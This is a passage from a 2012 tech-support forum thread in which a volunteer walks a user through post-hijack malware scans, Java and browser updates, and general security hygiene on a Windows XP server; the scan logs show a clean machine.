04-11-2012 23:45:27 System Checkpoint
05-11-2012 23:59:03 System Checkpoint

**** End of log ****

#4 Novicode

Novicode
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:04 PM

Posted 06 November 2012 - 07:13 PM

The computer appears to be running normally. I have been using it for server hosting ever since the incident and have had no sign of change.

#5 dev00790

dev00790

    Bleeping Chocoholic


  • Members
  • 5,037 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:UK
  • Local time:11:04 PM

Posted 07 November 2012 - 07:44 PM

Hi

The computer appears to be running normally. I have been using it for server hosting ever since the incident and have had no sign of change.


I would recommend we continue looking into the computer.
- There may be malware on there that some tools identify, which have not been run yet.
- Also I see lots of outdated software, such as Internet Explorer 6, and Java which leave your computer wide open to the possibility of being (re)infected in the future.

Let me know what you decide to do.

Regards, dev00790

---------------------------------------

Marge: "Homer, the plant called. They said if you don't show up tomorrow don't bother showing up on Monday." Homer: "Woo-hoo! Four-day weekend!"I do not reply to Private Messages (PMs) asking for assistance - please use the forums instead. If I have been helping you, and I have not replied to your latest post in 48 hours please send me a PM. My Blog


#6 Novicode

Novicode
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:04 PM

Posted 07 November 2012 - 09:13 PM

I would like to continue looking into the computer, just in case. I don't use, nor care about IE but I will update Java when I find the time tomorrow. What should we do next?

#7 dev00790

dev00790

    Bleeping Chocoholic


  • Members
  • 5,037 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:UK
  • Local time:11:04 PM

Posted 08 November 2012 - 07:40 PM

Hi

Please do the following next:

:step1:

Download Malwarebytes' Anti-Malware (aka MBAM): http://www.malwarebytes.org/mbam-download.php to your desktop.

  • Double-click mbam-setup.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to Update Malwarebytes'
    Anti-Malware
    and Launch Malwarebytes' Anti-Malware, then click Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select Perform full scan, then click Scan.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Be sure that everything is checked, and click Remove Selected.
  • When completed, a log will open in Notepad.
  • Post the log in your next reply.

If requested by MBAM, restart the computer.

The log can also be found here:
C:\Documents and Settings\<Username>\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\log-date.txt
Or at C:\Users\<Username>\AppData\Roaming\Malwarebytes\Malwarebytes' Anti-Malware\Logs\log-date.txt


:step2:

I'd like us to scan your machine with ESET Online Scanner:

Note: You can use either Internet Explorer or Mozilla FireFox for this scan. You will however need to disable your current installed Anti-Virus, how to do so can be read here.

Note: Vista/Windows 7 users: You will need to to right-click on the either the IE or FF icon in the Start Menu or Quick Launch Bar on the Taskbar and select Run as Administrator from the context menu.

  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the Posted Image button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the Posted Image
      icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • On ESET: Click the Back button, then the Finish button.
Note: Do not forget to re-enable your Anti-Virus application after running the above scan!


:step3:

How is the computer running now?

Regards, dev00790

---------------------------------------

Marge: "Homer, the plant called. They said if you don't show up tomorrow don't bother showing up on Monday." Homer: "Woo-hoo! Four-day weekend!"I do not reply to Private Messages (PMs) asking for assistance - please use the forums instead. If I have been helping you, and I have not replied to your latest post in 48 hours please send me a PM. My Blog


#8 Novicode

Novicode
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:04 PM

Posted 10 November 2012 - 08:24 AM

MBAM:

Malwarebytes Anti-Malware 1.65.1.1000
www.malwarebytes.org

Database version: v2012.11.08.11

Windows XP Service Pack 3 x86 NTFS
Internet Explorer 6.0.2900.5512
Joe :: SERVER [administrator]

11/8/2012 8:46:17 PM
mbam-log-2012-11-08 (20-46-17).txt

Scan type: Full scan (C:\|)
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 343482
Time elapsed: 3 hour(s), 29 minute(s), 36 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)

ESET:

There was not a "List Threats" button because there were no threats found.

I have never noticed a change in the computer since the incident, it's still running good like it should be.

#9 dev00790

dev00790

    Bleeping Chocoholic


  • Members
  • 5,037 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:UK
  • Local time:11:04 PM

Posted 10 November 2012 - 10:43 AM

Hi


:step1:

Important Note: Your version of Internet Explorer is outdated. Older versions have vulnerabilities that malicious sites can use to exploit and infect your system.



:step2:

Important Note: Your version of Java is out of date. Older versions have vulnerabilities that malicious sites can use to exploit and infect your system.


Please follow these steps to remove older version Java components and update:

  • Download the latest version of Java Runtime Environment (JRE) Version 9 and save it to your desktop.
  • Look for "Java Platform, Standard Edition".
  • Click the "Download JRE" button to the right.
  • Read the License Agreement, and then check the box that says: "Accept License Agreement".
  • From the list, select your OS and Platform (32-bit or 64-bit).
    64-bit OS users, should read: Which Java download should I choose for my 64-bit Windows operating system?
  • If a download for an Offline Installation is available, it is recommended to choose that and save the file to your desktop.
  • Close any programs you may have running - especially your web browser.

Go to Posted Image > Control Panel, double-click on Add/Remove Programs or Programs and Features in Vista/Windows 7 and remove all older versions of Java.
  • Check (highlight) any item with Java Runtime Environment (JRE or J2SE) in the name.
  • Click the Remove or Change/Remove button and follow the onscreen instructions for the Java uninstaller.
  • Repeat as many times as necessary to remove each Java versions.
  • Reboot your computer once all Java components are removed.
  • Then from your desktop double-click on jre-7u9-windows-i586.exe (or jre-7u9-windows-x64.exe for 64-bit) to install the newest version.
  • If using Windows 7 or Vista and the installer refuses to launch due to insufficient user permissions, then Run As Administrator.
  • When the Java Setup - Welcome window opens, click the Install > button.
  • If offered any unwanted software or toolbars during installation, just uncheck the box before continuing unless you want it.
  • The McAfee Security Scan Plus tool is installed by default unless you uncheck the McAfee installation box when updating Java.

Note: The Java Quick Starter (JQS.exe) adds a service to improve the initial startup time of Java applets and applications but it's not necessary.
To disable the JQS service if you don't want to use it:
  • Go to Start > Control Panel > Java > Advanced > Miscellaneous and uncheck the box for Java Quick Starter.
  • Click Ok and reboot your computer.


:step3:

Rerun Security Check by screen317 on your desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document in your next reply.

Edited by dev00790, 10 November 2012 - 10:44 AM.

Regards, dev00790

---------------------------------------

Marge: "Homer, the plant called. They said if you don't show up tomorrow don't bother showing up on Monday." Homer: "Woo-hoo! Four-day weekend!"I do not reply to Private Messages (PMs) asking for assistance - please use the forums instead. If I have been helping you, and I have not replied to your latest post in 48 hours please send me a PM. My Blog


#10 Novicode

Novicode
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:04 PM

Posted 11 November 2012 - 11:41 AM

Security Check:

Results of screen317's Security Check version 0.99.54
Windows XP Service Pack 3 x86
Internet Explorer 8
``````````````Antivirus/Firewall Check:``````````````
Windows Firewall Enabled!
AVG 2013
ESET Online Scanner v3
`````````Anti-malware/Other Utilities Check:`````````
Malwarebytes Anti-Malware version 1.65.1.1000
Java 7 Update 9
````````Process Check: objlist.exe by Laurent````````
AVG avgwdsvc.exe
AVG avgrsx.exe
AVG avgemc.exe
`````````````````System Health check`````````````````
Total Fragmentation on Drive C:: 33% Defragment your hard drive soon! (Do NOT defrag if SSD!)
````````````````````End of Log``````````````````````

Looks like I still need to defrag, but I can do that later. The PC is still running fine, just like before it was hijacked. Although it appears there aren't any malware on the machine, what else should we check? For example, could the person have tampered with settings or things like that?

Edited by Novicode, 11 November 2012 - 11:43 AM.


#11 dev00790

dev00790

    Bleeping Chocoholic


  • Members
  • 5,037 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:UK
  • Local time:11:04 PM

Posted 11 November 2012 - 06:56 PM

Your machine appears clean!

Are you having any additional problems at this point? If so, please let me know. Otherwise feel free to enjoy use of your repaired machine :thumbup2:

----------------

Please set your system to hide all hidden files.

  • Click Start, open My Computer, select the Tools menu and click Folder Options.
  • Select the View Tab. Under the Hidden files and folders heading,
    • Uncheck Show hidden files and folders.
    • Check: Hide file extensions for known file types.
    • Check: Hide protected operating system files (recommended) option.
  • Click Yes to confirm.

Removing all System Restore points except the last

  • Click Start, Run and type CLEANMGR and press Enter
  • Select the hard disk partition (usually C:) then press OK
  • At the top of the dialog, click the tab More Options. - If the tab this is not visible then press Clean up system files, then Select the hard disk partition (usually C:), then press OK. Then click on the More options button.
  • Under System Restore section, click the button Clean up....
  • Click Delete.

----------------

The most common cause of an infected machine is the Trojan Horse, or programs which appear to be legitimate but which contain malicious payloads, or which are simply malicious in and of themselves. No antivirus, firewall, host-based intrusion prevention system (HIPS), or other security software can fully protect you against this kind of attack. The best way to project yourself is not to run email attachments from untrusted sources, and avoid software downloaded from the internet wherever possible. Remember, when you run an application, you are giving that application permission to do to your machine anything you can do the machine, including create, modify, or destroy files or other data. In the Windows (and most other systems' such as Unix) security model, applications don't have privileges, users do.

The second most common cause of infection is out of date software. Leaving your system unpatched leaves holes through which attackers can execute code on your behalf without your consent. This goes for far more than common targets such as Windows and Internet Explorer. Most recent threats target other third party software, such as Adobe's Adobe Reader, Shockwave Player, or Flash Player, or Oracle's Java browser plugins. You can check your system for out of date software manually, or by using automated tools such as Secunia's Personal Software Inspector. This goes doubly for security applications such as antivirus and other antimalware products based on definition lists, where out of date lists mean no detection of newer malware.

Finally, occasionally you will be forced to run some potentially infected binary, or attackers will use a hole which is unpatched by software vendors, so a last line of defense is needed. That means turning on a firewall (Windows Firewall included with Windows XP SP2 or later is fine) and leaving it on, and using and keeping up to date an antivirus solution such as Norton AntiVirus. Antiviral solutions don't even have to cost money; for instance Microsoft Secuity Essentials provides perfectly acceptable protection for free. If for some reason you don't like MSE, there are other free products available as well:
  • Avast (home use only)
  • Avira (shows nag screen to purchase full product when updating, home use only)
  • AVG (slightly poorer performance as of late)

That should be fine for the majority of users. However, if you absolutely want additional protection, consider one or more of the following products:
If you want more information on methods malware use to infect your computer, consider browsing our How did I get infected? topic.

Regards, dev00790

---------------------------------------

Marge: "Homer, the plant called. They said if you don't show up tomorrow don't bother showing up on Monday." Homer: "Woo-hoo! Four-day weekend!"I do not reply to Private Messages (PMs) asking for assistance - please use the forums instead. If I have been helping you, and I have not replied to your latest post in 48 hours please send me a PM. My Blog


#12 Novicode

Novicode
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:06:04 PM

Posted 11 November 2012 - 07:04 PM

Thank you so much for your concern and quick but very detailed help. I will definatly turn to bleeping computer with any other issue I cannot fix myself, or simply if I need guidance with something I have not experience before, like this. Thanks again!

#13 dev00790

dev00790

    Bleeping Chocoholic


  • Members
  • 5,037 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:UK
  • Local time:11:04 PM

Posted 11 November 2012 - 07:23 PM

You're welcome :)

Regards, dev00790

---------------------------------------

Marge: "Homer, the plant called. They said if you don't show up tomorrow don't bother showing up on Monday." Homer: "Woo-hoo! Four-day weekend!"I do not reply to Private Messages (PMs) asking for assistance - please use the forums instead. If I have been helping you, and I have not replied to your latest post in 48 hours please send me a PM. My Blog





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users